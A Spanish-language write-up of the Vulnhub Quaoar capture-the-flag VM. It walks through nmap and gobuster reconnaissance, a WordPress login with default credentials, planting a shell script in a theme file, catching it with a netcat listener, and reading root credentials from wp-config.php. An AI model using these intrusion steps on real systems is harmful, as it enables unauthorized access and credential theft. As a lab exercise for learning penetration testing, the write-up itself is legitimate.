CTF Hackfest2016: Quaoar VM

 

Lo primero es hacer reconocimiento de los servicios que están corriendo con nmap.
$ sudo nmap -sV -Pn -A -O -oN smaggrotto 192.168.2.12
Starting Nmap
Nmap scan report for 192.168.2.12
Host is up (0.00088s latency).
Not shown: 991 closed tcp ports (reset)
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 d00a61d5d03a38c267c3c3428faeabe5 (DSA)
|   2048 bce03bef97999a8b9e96cf02cdf15edc (RSA)
|_  256 8c734683988f0df7f5c8e458680f8075 (ECDSA)
53/tcp  open  domain      ISC BIND 9.8.1-P1
| dns-nsid:
|_  bind.version: 9.8.1-P1
80/tcp  open  http        Apache httpd 2.2.22 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
| http-robots.txt: 1 disallowed entry
|_Hackers
|_http-server-header: Apache/2.2.22 (Ubuntu)
110/tcp open  pop3        Dovecot pop3d
| ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T04:32:43
|_Not valid after:  2026-10-07T04:32:43
|_pop3-capabilities: CAPA RESP-CODES SASL STLS PIPELINING TOP UIDL
|_ssl-date: 2023-02-19T01:39:13+00:00; +2s from scanner time.
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open  imap        Dovecot imapd
|_imap-capabilities: more LOGIN-REFERRALS Pre-login IMAP4rev1 have LITERAL+ SASL-IR ENABLE IDLE listed STARTTLS ID post-login capabilities OK LOGINDISABLEDA0001
| ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T04:32:43
|_Not valid after:  2026-10-07T04:32:43
|_ssl-date: 2023-02-19T01:39:13+00:00; +2s from scanner time.
445/tcp open  netbios-ssn Samba smbd 3.6.3 (workgroup: WORKGROUP)
993/tcp open  ssl/imap    Dovecot imapd
|_imap-capabilities: LOGIN-REFERRALS Pre-login IMAP4rev1 more LITERAL+ SASL-IR ENABLE IDLE AUTH=PLAINA0001 have ID post-login listed OK capabilities
|_ssl-date: 2023-02-19T01:39:13+00:00; +2s from scanner time.
| ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T04:32:43
|_Not valid after:  2026-10-07T04:32:43
995/tcp open  ssl/pop3    Dovecot pop3d
|_ssl-date: 2023-02-19T01:39:13+00:00; +2s from scanner time.
| ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T04:32:43
|_Not valid after:  2026-10-07T04:32:43
|_pop3-capabilities: CAPA RESP-CODES SASL(PLAIN) USER PIPELINING TOP UIDL
MAC Address: **:**:**:**:**:** (***)
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.5
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 50m02s, deviation: 2h02m28s, median: 1s
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: QUAOAR, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-os-discovery:
|   OS: Unix (Samba 3.6.3)
|   NetBIOS computer name:
|   Workgroup: WORKGROUP\x00
|_  System time: 2023-02-18T20:39:05-05:00


 Al visitar el navegador se encuentra con esto.

 

Después se escaneó los directorios disponibles.
$ gobuster dir -u http://192.168.2.12/ -e -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
http://192.168.2.12/index                (Status: 200) [Size: 100]
http://192.168.2.12/upload               (Status: 301) [Size: 313] [--> http://192.168.2.12/upload/]
http://192.168.2.12/wordpress            (Status: 301) [Size: 316] [--> http://192.168.2.12/wordpress/]
http://192.168.2.12/robots               (Status: 200) [Size: 271]
http://192.168.2.12/hacking              (Status: 200) [Size: 616848]
http://192.168.2.12/INSTALL              (Status: 200) [Size: 1241]
http://192.168.2.12/LICENSE              (Status: 200) [Size: 1672]
http://192.168.2.12/COPYING              (Status: 200) [Size: 35147]
http://192.168.2.12/CHANGELOG            (Status: 200) [Size: 224]
http://192.168.2.12/server-status        (Status: 403) [Size: 293]

 Luego de verificar los directorios que se habían encontrado, la ruta /wordpress tenía una página en WordPress, además se volvió a escanear a partir de la nueva ruta.

$ gobuster dir -u http://192.168.2.12/wordpress/ -e -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
http://192.168.2.12/wordpress/wp-content           (Status: 301) [Size: 327] [--> http://192.168.2.12/wordpress/wp-content/]
http://192.168.2.12/wordpress/license              (Status: 200) [Size: 19930]
http://192.168.2.12/wordpress/wp-includes          (Status: 301) [Size: 328] [--> http://192.168.2.12/wordpress/wp-includes/]
http://192.168.2.12/wordpress/readme               (Status: 200) [Size: 7195]
http://192.168.2.12/wordpress/index                (Status: 301) [Size: 0] [--> http://192.168.2.12/wordpress/index/]
http://192.168.2.12/wordpress/wp-login             (Status: 200) [Size: 2530]
http://192.168.2.12/wordpress/wp-admin             (Status: 301) [Size: 325] [--> http://192.168.2.12/wordpress/wp-admin/]
http://192.168.2.12/wordpress/wp-trackback         (Status: 200) [Size: 135]
http://192.168.2.12/wordpress/xmlrpc               (Status: 200) [Size: 42]
http://192.168.2.12/wordpress/wp-signup            (Status: 302) [Size: 0] [--> /wordpress/wp-login.php?action=register]

Al ir a la ruta /wp-login, se pudo ingresar a partir de una credencial por defecto, ingreso al panel de control, dirigiendo hacia la sección de plug-in, ingreso un script.

Seguido se deja escuchando en un puerto con el comando "nc -lvnp 4567", se acciona el script yendo a la ruta

http://192.168.2.12/wordpress/wp-content/themes/twentyfourteen/404.php

Seguido, se comprueba el ID y se busca el primer flag.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@Quaoar:/home/wpadmin$ ls
ls
flag.txt
www-data@Quaoar:/home/wpadmin$ cat flag.txt
cat flag.txt
********************c3c514de796e

Después buscando se encontró dentro de los archivos de wp un archivo con las credenciales de root.
www-data@Quaoar:/var/www/wordpress$ cat wp-config.php
...
define('DB_NAME', 'wordpress');

/** MySQL database username */
define('DB_USER', 'root');

/** MySQL database password */
define('DB_PASSWORD', '**********rd!');

/** MySQL hostname */
define('DB_HOST', 'localhost');
...

Para ingresar con el comando, su root y su respectiva contraseña. La último flag está más difícil de escontrar de manera manual, para solucionarlo con el comando egrep.
root@Quaoar:~# egrep -r " [a-z0-9]{32,32}" /etc/ 2>/dev/null
/etc/alternatives/ghostscript-current/lib/sharp.upp:   1b451b451b451b451b451b451b451b451b451b451b451b451b451b451b451b45
/etc/alternatives/ghostscript-current/lib/dnj750m.upp:   40504a4c204a4f42204e414d45203d20226773220d0a
/etc/alternatives/ghostscript-current/lib/dnj750m.upp:   40504a4c20534554204d4952524f52203d204f4646200a
/etc/alternatives/ghostscript-current/lib/dnj750m.upp:   40504a4c205345542050414c45545445534f55524345203d20534f465457415245200a
/etc/alternatives/ghostscript-current/lib/dnj750m.upp:   40504a4c205345542052454e4445524d4f4445203d20475241595343414c45200a
/etc/alternatives/ghostscript-current/lib/dnj750m.upp:   40504a4c20534554205245534f4c5554494f4e203d2030200a
....

Para finalizar dejo un fragmento de la nota.
"...operating system good job you..."

Muchas gracias a @viper que nos brindó esta VM. Hasta la próxima.

Vulnhub: hackfest2016: Quaoar